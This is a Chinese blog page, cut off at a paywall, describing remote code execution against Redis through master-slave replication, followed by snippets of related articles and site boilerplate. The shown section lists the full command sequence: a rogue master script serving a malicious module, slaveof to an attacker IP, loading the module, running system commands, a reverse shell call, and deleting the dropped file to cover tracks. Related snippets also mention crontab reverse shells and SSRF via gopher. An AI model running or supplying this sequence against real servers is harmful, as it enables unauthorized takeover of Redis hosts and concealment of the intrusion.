redis主从复制

最新推荐文章于 2024-10-08 08:11:26 发布
最新推荐文章于 2024-10-08 08:11:26 发布
阅读量408 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 书籍工具资料收集 文章标签: 安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hacker_zrq/article/details/139132017
本文探讨了Redis主从复制过程中可能存在的RCE风险。首先详细记录了手动触发主从复制RCE的步骤,包括编写脚本构造恶意Redis服务器并监听本地端口。接着,介绍了如何通过主从复制实现反弹shell,提到了利用SSRF漏洞代码,通过dict和gopher协议成功获取shell的方法。

一、主从复制RCE

手动操作过程记录:

1、编写脚本,构造恶意Redis服务器,监听本地端口1234,加载exp.so。

python RogueServer.py --lport 1234 --exp exp.so

2、通过未授权访问连入要攻击的redis服务器。

执行相关命令:

#设置redis的备份路径为当前目录
    config set dir ./
#设置备份文件名为exp.so,默认为dump.rdb
    config set dbfilename exp.so
#设置主服务器IP和端口
    slaveof 192.168.172.129 1234  
#加载恶意模块
    module load ./exp.so
#切断主从,关闭复制功能
    slaveof no one 
#执行系统命令
    system.exec 'whoami'
    system.rev 127.0.0.1 9999    
#通过dump.rdb文件恢复数据
    config set dbfilename dump.rdb
#删除exp.so
    system.exec 'rm ./exp.so'
#卸载system模块的加载
了解本专栏 订阅专栏 解锁全文
Redis主从复制RCE(4.x、5.x)
qq_57163799的博客
08-20 909
Redis未授权访问之主从复制RCE(利用简单快速)!!!
Redis主从复制实现RCE
rev1ve的博客
12-01 4375
主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。 也就是说,所有的数据修改只在主服务器上进行,然后将最新的数据同步给从服务器,这样就使得主从服务器的数据是一致的。建立主从复制,有3种方式:PS:建立主从关系只需要在从节点操作就行了,主节点不用任何操作我们先在同一个机器开两个red
Redis基于主从复制RCE
m0_58596609的博客
10-13 2761
Redis基于主从复制RCE
redis主从复制_Redis 基于主从复制RCE 利用方式
weixin_39638057的博客
11-19 403
作者:LoRexxar'@知道创宇404实验室时间:2019年7月9日在2019年7月7日结束的WCTF2019 Final上,LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式[1],比起以前的利用方式来说,这种利用方式更为通用,危害也更大,下面就让我们从以前的redis RCE利用方式出发,一起聊聊关于redis的利用问题。1. 通过...
Redis主从复制问题和扩容问题的解决思路
01-19
为了解决Redis主从Copy的问题,有如下两个解决方案: 主动复制所谓主动复制,就是业务层双写多个Redis,避开Redis自带的主从复制。但是自己干同步,就会产生一致性问题,为了保证主从一致,需要加入一系列的验证机制...
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
Redis主从复制以及主从复制技术原理.docx
10-14
Redis 主从复制技术原理 概述 Redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API。Redis 主从复制是指将一台 Redis 服务器的数据,复制到...
Redis主从复制和集群配置
08-21
### Redis主从复制和集群配置详解 #### 一、Redis主从复制原理及配置 **1.1 概述** Redis主从复制机制是一种重要的数据同步方式,它支持一个或多个从数据库(slave)与主数据库(master)之间进行数据同步。其中,...
Redis-主从复制
shui2104的博客
09-27 334
Redis-主从复制 ​ 为了避免单点Redis服务器故障,准备多台服务器,相互连通。将数据多个副本保存在不同的服务器上,连接在一起,并保证数据是同步的。即使其中某一台服务器宕机,其他服务器依然可以继续提供服务,实现Redis的高可用,同时实现数据冗余备份。 ​ 主从复制即将master中的数据有效及时的复制到slave中。一个master可以对应多个slave,一个slave只能对应一个master。 master:复制写数据,执行写操作时,将出现变化的数据自动同步到slave。读数据的操作基本可忽略
windows下redis主从复制部署
liuxiaohui1的博客
05-12 305
1、windows下主从复制redis 2、修改端口号 port 6380 配置主从服务 slaveof 127.0.0.1 6379 3、报错:D:\ProgramFiles\redis>redis-server.exe --service-install redis.windows.conf --loglevel verbose [12820] 06 Sep 11:00:26.431 # HandleServiceCommands: system error caught. error cod
redis 主从复制 rce 和 题目复现
qq_41891666的博客
07-03 1666
0x01 RESP 协议 redis 客户端和服务端之间采用RESP 协议来通信,RESP 协议全称 REdis Serialization Protocol 理解 Redis 的 RESP 协议 搞清RESP 协议,就可以看懂 redis-rogue-server.py 中是怎么构造协议的了,以及怎么把redis 客户端命令转化成 通信时的 数据了 0x02 主从复制 中的FULLRESYNC (全局同步): 贴一篇文章,讲到很详细:Redis 全量同步解析 也就是说master 回复 +FULLR
Redis 4.x5.x 未授权访问漏洞(Redis基于主从复制RCE
黑白的博客
12-06 2271
声明 好好学习,天天向上 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。 影响范围 SaltStack < 2019.2.4 SaltStack &l
Redis进行RCE利用总结
weixin_50464560的博客
11-07 2930
百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。连接到redis,输入以下指令利用crontab反弹shell。Redis因配置不当可导致攻击者直接获取到服务器的权限。倘若服务器运行着LAMP/LNMP服务,且已知工作目录为。kali中打开一个新的命令行窗口执行。
漏洞复现之Redis-rce
weixin_30300225的博客
07-11 400
通过主从复制 GetShell  Redis主从复制   Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机...
【渗透测试】redis漏洞利用
网络安全从业者的学习笔记
03-16 2325
redis是一个key-value存储系统,在诸多版本中存在一系列的漏洞,对漏洞进行复现:写入Webshell、写入定时任务、主从复制命令执行、如何通过利用SSRF结合gopher、dict协议打redis。切勿利用漏洞非法获取数据
如何通过主从复制漏洞攻击 Redis 数据库和修复这个漏洞
alankuo的专栏
10-08 586
masterauth。
渗透测试之地基服务篇:服务攻防之数据库Redis(下)
wangluoanquan111的博客
08-01 455
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
Redis主从复制
最新发布
03-10
### Redis主从复制配置方法 #### Docker环境下的Redis主从复制设置 为了在Docker环境中成功配置Redis主从复制,需先理解基本概念以及具体的操作流程。 #### 基本概念解释 主从复制意味着将一台Redis服务器的数据同步至其他Redis实例。此过程涉及两个角色:一个是作为数据源的主节点(master),另一个是从主节点接收更新副本的从节点(slave)。这种架构允许读取负载均衡,并提供了一定程度上的冗余保障[^2]。 #### 创建网络连接以便容器间通信 确保所有参与复制的Redis服务能够相互通信至关重要。为此,建议创建专用的Docker网络来促进这些交互: ```bash docker network create redis-network ``` #### 启动主服务器 启动一个名为`redis-master`的服务端口映射到主机6379端口上,并将其加入之前建立好的自定义网络中去: ```bash docker run -d --name redis-master -p 6379:6379 --network redis-network redis ``` 这一步骤建立了整个集群的核心——即存储实际键值对的地方[^3]。 #### 修改配置文件支持远程访问 为了让后续添加的从机可以正常连通主机,需要调整默认不允许外部链接的安全策略。可以通过编辑已有的配置文件或者挂载新的配置文件方式完成这项工作。这里给出一种基于后者的方法示例: ```bash vim /home/docker/redis6379/conf/redis.conf ``` 在此文件内部找到有关绑定地址的部分(`bind`)取消其注释状态并将值设为空白表示接受来自任何地方请求;另外还需开启认证机制以增强安全性(如果适用的话)[^4]。 #### 添加并初始化第一个从属节点 现在准备就绪向系统引入首个辅助成员了。执行如下指令部署新实例同时指定它所依赖的目标对象名称为先前提到过的那个“master”。 ```bash docker run -d --name redis-slave1 --link redis-master:master \ --network redis-network \ -e REDIS_MASTER_HOST=master \ -e REDIS_MASTER_PORT=6379 \ -p 6380:6379 \ redis redis-server --slaveof master 6379 ``` 上述命令不仅完成了容器本身的创建工作还指定了必要的环境变量用于告知子进程应当追随哪台机器成为自己的上级领导单位。 #### 扩展更多跟随者 如果有需求进一步扩大规模只需重复上面的过程更改相应参数比如暴露不同对外监听接口即可轻松达成目的。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ad_m1n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值